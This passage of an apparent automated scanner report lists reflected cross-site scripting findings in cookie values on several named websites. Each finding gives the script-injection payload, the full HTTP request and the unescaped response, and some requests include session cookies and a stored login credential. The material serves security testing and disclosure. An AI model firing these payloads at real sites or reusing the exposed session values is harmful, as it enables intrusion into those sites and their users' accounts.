84742&', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046f1285<script>alert(1)</script>7568065879e', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...
6.83. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload a6378<script>alert(1)</script>96b3feedbdd was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&a6378<script>alert(1)</script>96b3feedbdd; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:29 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:29 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:29 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741409; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&a6378<script>alert(1)</script>96b3feedbdd', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&
...[SNIP]...
6.84. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload dedf1<script>alert(1)</script>6a1a09355da was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&dedf1<script>alert(1)</script>6a1a09355da; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:28 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741408; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
Apr 24 16:50:29 2011&prad=253732016&arc=186884742&', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&dedf1<script>alert(1)</script>6a1a09355da', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Th
...[SNIP]...
6.85. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload d5a27<script>alert(1)</script>214694deac1 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&d5a27<script>alert(1)</script>214694deac1; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:27 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:27 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:27 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741407; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&d5a27<script>alert(1)</script>214694deac1' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...
6.86. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload e2a7a<script>alert(1)</script>9043e21f1f9 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&e2a7a<script>alert(1)</script>9043e21f1f9; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:28 2011&e2a7a<script>alert(1)</script>9043e21f1f9=&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741408; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&e2a7a<script>alert(1)</script>9043e21f1f9', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "a
...[SNIP]...
6.87. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 9ba92<script>alert(1)</script>e69fd29fdd1 was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=19ba92<script>alert(1)</script>e69fd29fdd1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:30 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:30 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:30 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741410; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
ne:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&', "ar_s_p81479006": '19ba92<script>alert(1)</script>e69fd29fdd1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p81479006": 'exp=1&ini
...[SNIP]...
6.88. http://forums.manageengine.com/fbw [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.manageengine.com
Path:   /fbw

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22270"><script>alert(1)</script>5970609d8e4 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fbw?fbwId=49000004360353 HTTP/1.1
Host: forums.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); zdccn=067f90c3-40d8-4a59-bdeb-52669063c03a22270"><script>alert(1)</script>5970609d8e4; JSESSIONID=9FFB2A137484D14862CCB036AE627428; __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:12:05 GMT
Server: Apache-Coyote/1.1
Content-Length: 25959


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

<link href="//css.zohostat
...[SNIP]...
<input type="hidden" id="zdrpn" name="zdrpn" value="067f90c3-40d8-4a59-bdeb-52669063c03a22270"><script>alert(1)</script>5970609d8e4">
...[SNIP]...
6.89. http://forums.manageengine.com/fbw [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.manageengine.com
Path:   /fbw

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd770"-alert(1)-"80d1da2beeb was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fbw?fbwId=49000004360353 HTTP/1.1
Host: forums.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); zdccn=067f90c3-40d8-4a59-bdeb-52669063c03acd770"-alert(1)-"80d1da2beeb; JSESSIONID=9FFB2A137484D14862CCB036AE627428; __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:12:06 GMT
Server: Apache-Coyote/1.1
Content-Length: 25914


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

<link href="//css.zohostat
...[SNIP]...
<script>
//For I18N
var zuid = "-1";
var csrfParamName = "zdrpn";
var csrfToken = "067f90c3-40d8-4a59-bdeb-52669063c03acd770"-alert(1)-"80d1da2beeb";
var i18n = new Array();
i18n["zohodiscussions.settings.PleaseEnteravalue"]="The input field is empty!";
i18n["zohodiscussions.generalmessage.enteraValidemailaddre
...[SNIP]...
6.90. https://support.trust-guard.com/index.php [SWIFT_loginemail cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /index.php

Issue detail

The value of the SWIFT_loginemail cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48cca"><script>alert(1)</script>453c7785034 was submitted in the SWIFT_loginemail cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=1 HTTP/1.1
Host: support.trust-guard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SWIFT_loginpassword=DErwC5IL14LhnSqA7IFm011b3Yjo0HD7Sizs0xht1wo%3D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_loginemail=deleted48cca"><script>alert(1)</script>453c7785034; SWIFT_sessionid40=dwygqqtavu1d244w838kq6z6jm9eea2r; __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9;

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:49:50 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_sessionid40=deleted; expires=Sun, 25-Apr-2010 19:49:52 GMT; path=/
Set-Cookie: SWIFT_sessionid40=nb8cim55almb9p86x9yk5sbwpqi8fvjz; path=/
Connection: close
Content-Type: text/html
Content-Length: 20833


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-e
...[SNIP]...
<input type="text" name="loginemail" value="deleted48cca"><script>alert(1)</script>453c7785034" class="logintext">
...[SNIP]...
6.91. https://support.trust-guard.com/visitor/index.php [SWIFT_sessionid80 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/index.php

Issue detail

The value of the SWIFT_sessionid80 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaff5"%3balert(1)//8d66ba3bbd7 was submitted in the SWIFT_sessionid80 cookie. This input was echoed as aaff5";alert(1)//8d66ba3bbd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

